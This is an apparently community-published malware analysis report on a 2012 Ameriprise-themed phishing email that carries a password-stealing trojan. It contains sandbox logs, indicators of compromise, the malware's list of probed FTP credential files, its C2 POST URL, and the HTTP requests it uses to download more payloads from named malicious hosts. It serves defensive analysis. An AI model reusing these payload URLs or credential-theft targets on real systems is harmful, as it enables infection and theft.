-------------------------------------------------------------------------------- #MalwareMustDie !!! (analysis by @c_APT_ure) -------------------------------------------------------------------------------- Analysis summary: (details see further below...) ================= Initial infector: email attachment (exe in zip) Date: Mon 2012-10-29 15:03 From: Ameriprise Documents [noreply@mail.ameriprise.com] Subject: A new account statement is available Attachment: PDF-Ameriprise-Financial-51322492F36.zip (account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe) Analysis --> http://malwr.com/analysis/841b0eb462c444dc2a6fab52ff5a3e36/ https://www.virustotal.com/file/6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04/analysis/ Detection ratio: 26 / 44 Analysis date: 2012-10-30 11:05:06 UTC ( 1 hour, 16 minutes ago ) Detection ratio: 29 / 44 Analysis date: 2012-10-30 12:42:50 UTC ( 20 minutes ago ) Indicators: * DNS requests... --> malware domains 3.gutterkings.org (173.246.104.21) brianjameswhite.com (97.74.215.61) estilianaragdolls.de (217.119.58.37) kuntticaret.com (94.199.206.44) www.gamarubber.com (212.36.8.230) www.10130138.wavelearn.de (213.157.16.3) hotnewinfo.info (174.120.83.189) saltasalta.cl (200.29.152.130) * C2 checkin (?) URL: http://3.gutterkings.org/forum/viewtopic.php TYPE: POST UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) * Downloads further malware... http://brianjameswhite.com/7VTUy.exe http://estilianaragdolls.de/Si7ySG.exe http://kuntticaret.com/v6e7WMJ.exe http://www.gamarubber.com/NPY.exe http://www.10130138.wavelearn.de/4pxp.exe http://hotnewinfo.info/8fhr0.exe http://saltasalta.cl/8Mo.exe * all malware exe's are the same... $ md5sum Si7ySG.exe v6e7WMJ.exe NPY.exe 4pxp.exe 8fhr0.exe 8Mo.exe f60566d2de1a221a37ddbcd880e8a184 Si7ySG.exe f60566d2de1a221a37ddbcd880e8a184 v6e7WMJ.exe f60566d2de1a221a37ddbcd880e8a184 NPY.exe f60566d2de1a221a37ddbcd880e8a184 4pxp.exe f60566d2de1a221a37ddbcd880e8a184 8fhr0.exe f60566d2de1a221a37ddbcd880e8a184 8Mo.exe https://www.virustotal.com/file/254843c2772aeec76e3704c1f1852f490fcc1535dbc7c08fbeb9f7cef16ce7a3/analysis/ Detection ratio: 11 / 44 Analysis date: 2012-10-29 14:12:36 UTC ( 22 hours, 26 minutes ago ) https://www.virustotal.com/file/254843c2772aeec76e3704c1f1852f490fcc1535dbc7c08fbeb9f7cef16ce7a3/analysis/1351600846/ Detection ratio: 29 / 43 Analysis date: 2012-10-30 12:40:46 UTC ( 1 minute ago ) Analysis --> http://malwr.com/analysis/f60566d2de1a221a37ddbcd880e8a184/ -------------------------------------------------------------------------------- https://www.virustotal.com/file/6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04/analysis/ SHA256: 6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 SHA1: 14b5a33be8edce970337c09545c900c65a128c94 MD5: 841b0eb462c444dc2a6fab52ff5a3e36 File size: 166.0 KB ( 169984 bytes ) File name: account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe File type: Win32 EXE Tags: peexe mz Detection ratio: 26 / 44 Analysis date: 2012-10-30 11:05:06 UTC ( 1 hour, 16 minutes ago ) AhnLab-V3 Trojan/Win32.Tepfer 20121029 AntiVir TR/Agent.169984.24 20121030 Avast Win32:Trojan-gen 20121030 BitDefender Trojan.Generic.KDV.774615 20121030 CAT-QuickHeal (Suspicious) - DNAScan 20121030 Commtouch W32/Trojan3.EEK 20121030 Comodo UnclassifiedMalware 20121030 DrWeb Trojan.PWS.Stealer.946 20121030 Emsisoft Trojan.Win32.Agent (A) 20121030 ESET-NOD32 Win32/PSW.Agent.NTM 20121030 F-Prot W32/Trojan3.EEK 20121030 F-Secure Trojan:W32/Agent.DUFZ 20121030 GData Trojan.Generic.KDV.774615 20121030 Ikarus Trojan-PWS.Multi 20121030 Kaspersky Trojan-PSW.Win32.Tepfer.boxb 20121030 McAfee Generic PWS.o 20121030 McAfee-GW-Edition Artemis!841B0EB462C4 20121030 Microsoft PWS:Win32/Fareit 20121030 MicroWorld-eScan Trojan.Generic.KDV.774615 20121030 PCTools Trojan.Zbot 20121030 Sophos Troj/Zbot-CWP 20121030 Symantec Trojan.Zbot 20121030 TrendMicro TSPY_FAREIT.EG 20121030 TrendMicro-HouseCall TSPY_FAREIT.EG 20121030 VIPRE Win32.Malware!Drop 20121030 ViRobot Trojan.Win32.A.PSW-Tepfer.169984 20121030 Symantec Reputation Suspicious.Insight F-Secure Deepguard Suspicious:W32/Malware!Online First seen by VirusTotal 2012-10-29 15:09:13 UTC ( 21 hours, 27 minutes ago ) Last seen by VirusTotal 2012-10-30 12:21:18 UTC ( 15 minutes ago ) File names (max. 25) 841b0eb462c444dc2a6fab52ff5a3e36 account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe 841b0eb462c444dc2a6fab52ff5a3e36 account.exe file-4705036_exe File system activity Opened files... \\.\PIPE\lsarpc (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed) C:\WINDOWS\wcx_ftp.ini (failed) C:\Documents and Settings\\wcx_ftp.ini (failed) C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed) C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed) C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed) C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed) C:\Documents and Settings\\Application Data\CuteFTP\sm.dat (failed) C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed) C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed) C:\Documents and Settings\All Users\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed) C:\Documents and Settings\All Users\Application Data\CuteFTP\sm.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\CuteFTP\sm.dat (failed) C:\Program Files\GlobalSCAPE\CuteFTP\sm.dat (failed) C:\Program Files\GlobalSCAPE\CuteFTP Pro\sm.dat (failed) C:\Program Files\GlobalSCAPE\CuteFTP Lite\sm.dat (failed) C:\Program Files\CuteFTP\sm.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\3\Sites.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\4\Sites.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\3\Quick.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\4\Quick.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\3\History.dat (failed) C:\Documents and Settings\\Application Data\FlashFXP\4\History.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat (failed) C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Sites.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Sites.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\Quick.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\Quick.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\3\History.dat (failed) C:\Documents and Settings\\Local Settings\Application Data\FlashFXP\4\History.dat (failed) C:\Documents and Settings\\Application Data\FileZilla\sitemanager.xml (failed) C:\Documents and Settings\\Application Data\FileZilla\recentservers.xml (failed) C:\Documents and Settings\\Application Data\FileZilla\filezilla.xml (failed) C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml (failed) C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml (failed) C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml (failed) C:\Documents and Settings\\Local Settings\Application Data\FileZilla\sitemanager.xml (failed) C:\Documents and Settings\\Local Settings\Application Data\FileZilla\recentservers.xml (failed) C:\Documents and Settings\\Local Settings\Application Data\FileZilla\filezilla.xml (failed) C:\Documents and Settings\\Application Data\ExpanDrive\drives.js (failed) C:\Documents and Settings\\Local Settings\Application Data\ExpanDrive\drives.js (failed) C:\Documents and Settings\All Users\Application Data\ExpanDrive\drives.js (failed) C:\Documents and Settings\\Application Data\SharedSettings.ccs (failed) C:\Documents and Settings\\Application Data\SharedSettings.sqlite (failed) C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\\Application Data\SharedSettings_1_0_5.sqlite (failed) C:\Documents and Settings\All Users\Application Data\SharedSettings.ccs (failed) C:\Documents and Settings\All Users\Application Data\SharedSettings.sqlite (failed) C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\All Users\Application Data\SharedSettings_1_0_5.sqlite (failed) C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.ccs (failed) C:\Documents and Settings\\Local Settings\Application Data\SharedSettings.sqlite (failed) C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\\Local Settings\Application Data\SharedSettings_1_0_5.sqlite (failed) C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.ccs (failed) C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed) C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed) C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.ccs (failed) C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed) C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\All Users\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed) C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.ccs (failed) C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings.sqlite (failed) C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.ccs (failed) C:\Documents and Settings\\Local Settings\Application Data\CoffeeCup Software\SharedSettings_1_0_5.sqlite (failed) C:\WINDOWS\32BitFtp.ini (failed) C:\WINDOWS\Registration\R000000000007.clb (successful) c:\autoexec.bat (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\Client Hash (failed) C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful) \\.\PIPE\wkssvc (successful) \\.\MountPointManager (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful) \\.\Ip (successful) C:\Documents and Settings\\Local Settings\Application Data\lejoy.zuh.dat (failed) C:\6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful) C:\WINDOWS\ (successful) C:\Documents and Settings\\Application Data\Ytqi (successful) C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful) C:\Documents and Settings\\Local Settings\Application Data\lejoy.zuh (successful) C:\Documents and Settings\\Local Settings\Application Data (successful) C:\Documents and Settings\\Application Data (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful) C:\WINDOWS\system32\cmd.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (failed) C:\Documents and Settings\\Application Data\Omce (successful) C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful) C:\Documents and Settings\\Local Settings\Application Data\lerik.keo (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat (successful) C:\WINDOWS\system32\rsaenh.dll (successful) C:\WINDOWS\system32\winsock.dll (successful) Read files... C:\WINDOWS\Registration\R000000000007.clb (successful) c:\autoexec.bat (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful) C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful) C:\WINDOWS\system32\rsaenh.dll (successful) C:\WINDOWS\system32\winsock.dll (successful) Written files... C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe (successful) C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful) C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat (successful) Deleted files... C:\Documents and Settings\\Application Data\Ytqi\eljez.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat (successful) C:\Documents and Settings\\Application Data\Omce\ohiw.exe (successful) Registry activity Set keys... KEY: HKEY_CURRENT_USER\Software\WinRAR\HWID TYPE: REG_BINARY VALUE: (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal TYPE: REG_SZ VALUE: C:\Documents and Settings\\My Documents (successful) KEY: HKEY_CURRENT_USER\Software\WinRAR\Client Hash TYPE: REG_BINARY VALUE: (successful) KEY: HKEY_CURRENT_USER\Software\WinRAR\7A9494DFE7BB3840D49ED0306194A6D8 TYPE: REG_BINARY VALUE: (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\\BaseClass TYPE: REG_SZ VALUE: Drive (successful) KEY: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents TYPE: REG_SZ VALUE: C:\Documents and Settings\All Users\Documents (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop TYPE: REG_SZ VALUE: C:\Documents and Settings\\Desktop (successful) KEY: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Desktop TYPE: REG_SZ VALUE: C:\Documents and Settings\All Users\Desktop (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass TYPE: REG_DWORD VALUE: 1 (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName TYPE: REG_DWORD VALUE: 1 (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet TYPE: REG_DWORD VALUE: 1 (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\(null)\C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe TYPE: REG_SZ VALUE: hundred thoseWell (successful) KEY: HKEY_CURRENT_USER\Software\Microsoft\Ebqa\2db39j1f TYPE: REG_SZ VALUE: 6NukTsmlmWPs7VPO (successful) Process activity Created processes... C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe" " (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe" " (successful) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe" " (failed) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe" " (failed) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe" " (failed) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe" " (failed) C:\Documents and Settings\\Application Data\Ytqi\eljez.exe"" (successful) C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\tmp6570d7ba.bat"" (successful) C:\Documents and Settings\\Application Data\Omce\ohiw.exe"" (successful) C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\tmp706c52b1.bat"" (successful) Shell commands... (open) C:\DOCUME~1\~1\LOCALS~1\Temp\79143.exe(null) [(null)] (successful) (open) C:\DOCUME~1\~1\LOCALS~1\Temp\79844.exe(null) [(null)] (successful) (open) C:\DOCUME~1\~1\LOCALS~1\Temp\83690.exe(null) [(null)] (successful) (open) C:\DOCUME~1\~1\LOCALS~1\Temp\84461.exe(null) [(null)] (successful) (open) C:\DOCUME~1\~1\LOCALS~1\Temp\84922.exe(null) [(null)] (successful) (open) C:\DOCUME~1\~1\LOCALS~1\Temp\86213.exe(null) [(null)] (successful) Code injections in the following processes... eljez.exe (successful) 83690.exe (successful) 84461.exe (successful) 84922.exe (successful) 86213.exe (successful) explorer.exe (successful) 79844.exe (successful) ohiw.exe (successful) VBoxTray.exe (successful) cmd.exe (successful) wscntfy.exe (successful) python.exe (successful) 6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful) dwwin.exe (successful) 6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (failed) Mutex activity Created mutexes... Global\{5E370004-F236-408B-8F92-61FCBA8C42EE} (successful) Global\{D800CEC9-3CFB-C6BC-F107-B06DC419937F} (successful) Global\{D800CEC9-3CFB-C6BC-810B-B06DB415937F} (successful) Global\{D800CEC9-3CFB-C6BC-6D0C-B06D5812937F} (successful) Global\{D800CEC9-3CFB-C6BC-190B-B06D2C15937F} (successful) Global\{CB561546-E774-D5EA-8F92-61FCBA8C42EE} (successful) Local\{744F300D-C23F-6AF3-8F92-61FCBA8C42EE} (successful) Global\{D800CEC9-3CFB-C6BC-0508-B06D3016937F} (successful) Global\{D800CEC9-3CFB-C6BC-7509-B06D4017937F} (successful) Global\{D800CEC9-3CFB-C6BC-490A-B06D7C14937F} (successful) Global\{D800CEC9-3CFB-C6BC-610A-B06D5414937F} (successful) Global\{D800CEC9-3CFB-C6BC-8D0A-B06DB814937F} (successful) Global\{D800CEC9-3CFB-C6BC-990A-B06DAC14937F} (successful) Global\{D800CEC9-3CFB-C6BC-390B-B06D0C15937F} (successful) Global\{D800CEC9-3CFB-C6BC-650B-B06D5015937F} (successful) Global\{D800CEC9-3CFB-C6BC-B90B-B06D8C15937F} (successful) Global\{D800CEC9-3CFB-C6BC-150C-B06D2012937F} (successful) Global\{D800CEC9-3CFB-C6BC-4D0C-B06D7812937F} (successful) Global\{D800CEC9-3CFB-C6BC-7D0C-B06D4812937F} (successful) Global\{D800CEC9-3CFB-C6BC-B10D-B06D8413937F} (successful) Global\{D800CEC9-3CFB-C6BC-250E-B06D1010937F} (successful) Global\{D800CEC9-3CFB-C6BC-650E-B06D5010937F} (successful) Global\{D800CEC9-3CFB-C6BC-ED08-B06DD816937F} (successful) Global\{D800CEC9-3CFB-C6BC-ED0B-B06DD815937F} (successful) Global\{D800CEC9-3CFB-C6BC-090D-B06D3C13937F} (successful) Global\{D800CEC9-3CFB-C6BC-BD0E-B06D8810937F} (successful) Global\{D800CEC9-3CFB-C6BC-690F-B06D5C11937F} (successful) Global\{D800CEC9-3CFB-C6BC-DD09-B06DE817937F} (successful) Global\{D800CEC9-3CFB-C6BC-990F-B06DAC11937F} (successful) Global\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (successful) Global\{38E3341C-C62E-265F-8F92-61FCBA8C42EE} (successful) Global\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (successful) Global\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (successful) Local\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (successful) Local\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (successful) Global\{D800CEC9-3CFB-C6BC-5D03-B06D681D937F} (successful) Global\{D800CEC9-3CFB-C6BC-550F-B06D6011937F} (successful) Opened mutexes... Global\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (failed) Local\{55E9553D-A70F-4B55-8F92-61FCBA8C42EE} (failed) Global\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (failed) Local\{55E9553C-A70E-4B55-8F92-61FCBA8C42EE} (failed) Global\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (failed) Local\{340FE32E-111C-2AB3-8F92-61FCBA8C42EE} (failed) Global\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (failed) Local\{340FE329-111B-2AB3-8F92-61FCBA8C42EE} (failed) Global\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (failed) Local\{EEE5022F-F01D-F059-8F92-61FCBA8C42EE} (failed) ShimCacheMutex (successful) Windows service activity Opened service managers... MACHINE: localhost DATABASE: SERVICES_ACTIVE_DATABASE (successful) Opened services... ProtectedStorage (successful) Runtime DLLs ole32.dll (successful) crypt32.dll (successful) advapi32.dll (successful) shell32.dll (successful) netapi32.dll (successful) kernel32.dll (successful) msi.dll (successful) rpcrt4.dll (successful) c:\6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 (successful) pstorec.dll (successful) secur32.dll (successful) userenv.dll (successful) clbcatq.dll (successful) comctl32.dll (successful) riched20.dll (successful) wininet.dll (successful) version.dll (successful) c:\windows\system32\mswsock.dll (successful) hnetcfg.dll (successful) c:\windows\system32\wshtcpip.dll (successful) dnsapi.dll (successful) c:\windows\system32\winrnr.dll (successful) rasadhlp.dll (successful) netapi32 (successful) setupapi.dll (successful) user32.dll (successful) shlwapi.dll (successful) gdi32.dll (successful) ws2_32.dll (successful) oleaut32.dll (successful) iphlpapi.dll (successful) msvcrt.dll (successful) ntdll.dll (successful) rsaenh.dll (successful) Additional details The file uses the IsDebuggerPresent Windows API function in order to see whether it is being debugged. The file sends control codes directly to certain device drivers making use of the DeviceIoControl Windows API function. Network activity HTTP requests... URL: http://3.gutterkings.org/forum/viewtopic.php TYPE: POST UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://brianjameswhite.com/7VTUy.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://estilianaragdolls.de/Si7ySG.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://kuntticaret.com/v6e7WMJ.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://www.gamarubber.com/NPY.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://www.10130138.wavelearn.de/4pxp.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://hotnewinfo.info/8fhr0.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) URL: http://saltasalta.cl/8Mo.exe TYPE: GET UA: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) DNS requests... 3.gutterkings.org (173.246.104.21) brianjameswhite.com (97.74.215.61) estilianaragdolls.de (217.119.58.37) kuntticaret.com (94.199.206.44) www.gamarubber.com (212.36.8.230) www.10130138.wavelearn.de (213.157.16.3) hotnewinfo.info (174.120.83.189) saltasalta.cl (200.29.152.130) TCP connections... 173.246.104.21:80 97.74.215.61:80 217.119.58.37:80 94.199.206.44:80 212.36.8.230:80 213.157.16.3:80 174.120.83.189:80 200.29.152.130:80 UDP communications... :53 209.255.152.66:17245 151.75.211.167:20817 76.177.215.185:25494 107.192.246.70:21834 108.198.141.10:27666 -------------------------------------------------------------------------------- http://malwr.com/analysis/841b0eb462c444dc2a6fab52ff5a3e36/ Analysis Package: None specified, automatically selected Analyzed on: 2012-10-29 08:24:01 PST Duration: 165 seconds File name: account_statement_user_id_FF34888177388500-193885FEC4558882994AECF45586994002F567999203AE4556869930CF3485688503.pdf.exe.exe File size: 169984 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: 841b0eb462c444dc2a6fab52ff5a3e36 SHA1: 14b5a33be8edce970337c09545c900c65a128c94 SHA256: 6f1aa591ab15e96992f7493b7c400ebb77e2fe61403be8de619fcc2d13cdbe04 SHA512: 2fad064f3b137a68b9a423c56240eda2ee84bb61d880262955af827d02949a38c149cdb72a7e53dd0f016778ace7b7eee8cf436b7bbe6558d547707b1a3b752f CRC32: 1125A89D Ssdeep: 3072:xBJweE28AKzPgX+tP1KU4BcmI4wY82pVOBqwmy75+pFL:xBJwGKEuB4FPpVtw7op Involved Hosts IP Address 0.0.0.0 255.255.255.255 10.0.2.2 10.0.2.15 239.255.255.250 224.0.0.22 10.0.2.255 173.246.104.21 97.74.215.61 217.119.58.37 209.255.152.66 151.75.211.167 76.177.215.185 107.192.246.70 108.198.141.10 74.167.73.210 88.75.145.198 84.221.201.209 94.199.206.44 212.36.8.230 66.219.11.78 99.244.152.48 213.157.16.3 174.120.83.189 64.191.132.50 200.29.152.130 99.174.233.11 76.5.130.26 75.73.59.26 195.169.125.228 67.71.10.219 90.173.50.23 70.138.242.12 78.188.43.119 96.246.54.170 67.82.110.139 74.125.141.106 66.235.184.138 87.29.248.48 216.98.102.194 119.207.250.61 97.73.181.51 75.151.131.29 98.245.68.61 67.68.17.116 68.55.47.14 79.15.105.167 108.17.156.159 99.95.77.238 Network Analysis DNS Requests + Hostname IP Address 3.gutterkings.org 173.246.104.21 brianjameswhite.com 97.74.215.61 estilianaragdolls.de 217.119.58.37 kuntticaret.com 94.199.206.44 www.gamarubber.com 212.36.8.230 www.10130138.wavelearn.de 213.157.16.3 hotnewinfo.info 174.120.83.189 saltasalta.cl 200.29.152.130 www.google.com 74.125.141.104 HTTP Requests + URL Data http://brianjameswhite.com/7VTUy.exe GET /7VTUy.exe HTTP/1.0 Host: brianjameswhite.com Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://estilianaragdolls.de/Si7ySG.exe GET /Si7ySG.exe HTTP/1.0 Host: estilianaragdolls.de Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://kuntticaret.com/v6e7WMJ.exe GET /v6e7WMJ.exe HTTP/1.0 Host: kuntticaret.com Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://www.gamarubber.com/NPY.exe GET /NPY.exe HTTP/1.0 Host: www.gamarubber.com Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) 